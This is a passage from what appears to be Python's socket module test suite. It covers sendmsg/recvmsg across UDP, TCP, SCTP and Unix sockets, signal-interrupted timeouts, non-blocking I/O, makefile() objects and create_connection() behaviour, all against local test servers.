self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
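# Note: the SIGALRM handler installed in setUp() raises ZeroDivisionError
# (via "1 / 0"), so an interrupted call is expected to propagate that
# exception rather than being retried or failing with OSError(EINTR); the
# assertRaises(ZeroDivisionError) checks below rely on this.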
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) is interrupted by the signal
        # and that the handler's ZeroDivisionError propagates.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
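# A minimal sketch (not part of the test suite) of the interruption pattern
# exercised above: with a timeout set, a blocking recv() hit by SIGALRM lets
# the handler's exception (ZeroDivisionError here) propagate instead of the
# call being retried. Assumes a POSIX platform with signal.setitimer(); the
# helper name is hypothetical and is never called by the tests.
def _example_interrupted_recv(sock):
    old_handler = signal.signal(signal.SIGALRM, lambda signum, frame: 1 / 0)
    try:
        sock.settimeout(4.0)
        signal.setitimer(signal.ITIMER_REAL, 0.05)
        try:
            sock.recv(1024)             # expected to be interrupted
        except ZeroDivisionError:
            return True                 # the handler's exception propagated
        return False
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)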
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, is
        # interrupted by the signal and that the handler's
        # ZeroDivisionError propagates.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
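# A minimal sketch (not part of the test suite): socketpair() returns two
# already-connected sockets, which is what BasicSocketPairTest relies on.
# The helper name is hypothetical and is never called by the tests.
def _example_socketpair_roundtrip():
    a, b = socket.socketpair()
    with a, b:
        a.sendall(b'ping')
        return b.recv(4)        # b'ping'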
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: if accept() is called on a listening socket that has a
        # timeout while the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: if accept() is called on a listening socket that has a
        # timeout while a default timeout is set, the resulting socket must
        # inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
        # the client hasn't sent data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client has now sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
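# A minimal sketch (not part of the test suite) of the relationship checked by
# assert_sock_timeout() above: any non-None timeout puts the descriptor into
# O_NONBLOCK mode, while the Python-level API still reports the socket as
# blocking. Assumes a POSIX platform where the fcntl module is available; the
# helper name is hypothetical and is never called by the tests.
def _example_timeout_implies_nonblocking_fd():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5.0)
        flags = fcntl.fcntl(s, fcntl.F_GETFL)
        assert flags & os.O_NONBLOCK    # fd is non-blocking internally
        assert s.getblocking()          # but the Python API reports blocking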
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
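# A minimal sketch (not part of the test suite) of the makefile() modes the
# classes above exercise: a binary reader and a text writer layered over one
# connected socket. Assumes the peer echoes the line back; the helper name is
# hypothetical and is never called by the tests.
def _example_makefile_modes(sock):
    reader = sock.makefile('rb')
    writer = sock.makefile('w', encoding='utf-8', newline='')
    writer.write('hello\n')
    writer.flush()              # nothing is sent until the buffer is flushed
    return reader.readline()    # blocks until the peer sends a full line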
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
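# A minimal sketch (not part of the test suite) of the behaviour asserted
# above: create_connection() tries every address getaddrinfo() returns and
# re-raises the last error, so callers may see any of several errnos. The
# host, port and helper name are illustrative only.
def _example_create_connection():
    try:
        return socket.create_connection(('localhost', 9), timeout=1.0)
    except OSError:
        # Could be ECONNREFUSED, ENETUNREACH or EADDRNOTAVAIL depending on
        # which resolved address failed last.
        raise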
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
